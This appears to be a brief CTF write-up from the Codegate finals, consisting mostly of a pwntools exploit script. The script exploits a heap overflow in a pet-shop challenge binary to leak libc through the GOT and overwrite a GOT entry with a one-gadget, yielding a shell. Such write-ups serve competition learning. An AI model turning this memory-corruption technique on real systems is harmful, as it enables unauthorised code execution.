This is the only challenge I solved at this year's Codegate finals, haha.
A heap overflow occurs, and I wrote the exploit by overwriting a pointer that sat inside the overflowed chunk.
```python
#!/usr/bin/env python
# powerprove
# Python 2 / pwntools exploit script as posted (str and bytes are interchangeable here).
from pwn import *

host = "localhost"
port = 4000

#s = remote("localhost", 4000)
s = remote("200.200.200.105", 9899)

# Pause so a debugger can be attached before any interaction
raw_input()

def menu(index):
    # Pick an entry from the main menu
    s.recvuntil("select")
    s.sendline(str(index))

def name(name):
    # Menu 6: set the player's name
    menu(6)
    s.recvuntil("name?")
    s.sendline(name)

def set_pet(index, name, sound, feed):
    # Menu 4: fill in a pet's name, sound and feed fields
    menu(4)
    s.recvuntil("set")
    s.sendline(str(index))
    s.recvuntil("name")
    s.sendline(name)
    s.recvuntil("sound")
    s.sendline(sound)
    s.recvuntil("feed")
    s.sendline(feed)

def buy(index):
    # Menu 1: buy a pet (allocates a heap chunk)
    menu(1)
    s.recvuntil("select")
    s.sendline(str(index))

if __name__ == "__main__":
    buy(1)
    buy(2)
    name("AAAAAAAA")
    # Overflow the feed field of pet 2 so the adjacent pointer points at the GOT
    set_pet(2, "A", "B", "C"*12+p64(0x604040)+"\x08")
    # Menu 5 prints through the overwritten pointer, leaking a libc address
    menu(5)
    s.recvuntil("person")
    s.recvuntil("person:")
    libc_start_main = u64(s.recv(8))
    libc_base = libc_start_main - 0x20740
    system_addr = libc_base + 0x45390
    one_shot = libc_base + 0xef6c4
    log.info("libc_start_main : "+str(hex(libc_start_main)))
    log.info("libc_base : "+str(hex(libc_base)))
    log.info("system_addr : "+str(hex(system_addr)))
    # Repoint the pointer at a second GOT entry and overwrite it via name()
    set_pet(2, "A", "B", "C"*12+p64(0x604028)+"\x08")
    name(p64(one_shot))
    s.interactive()
```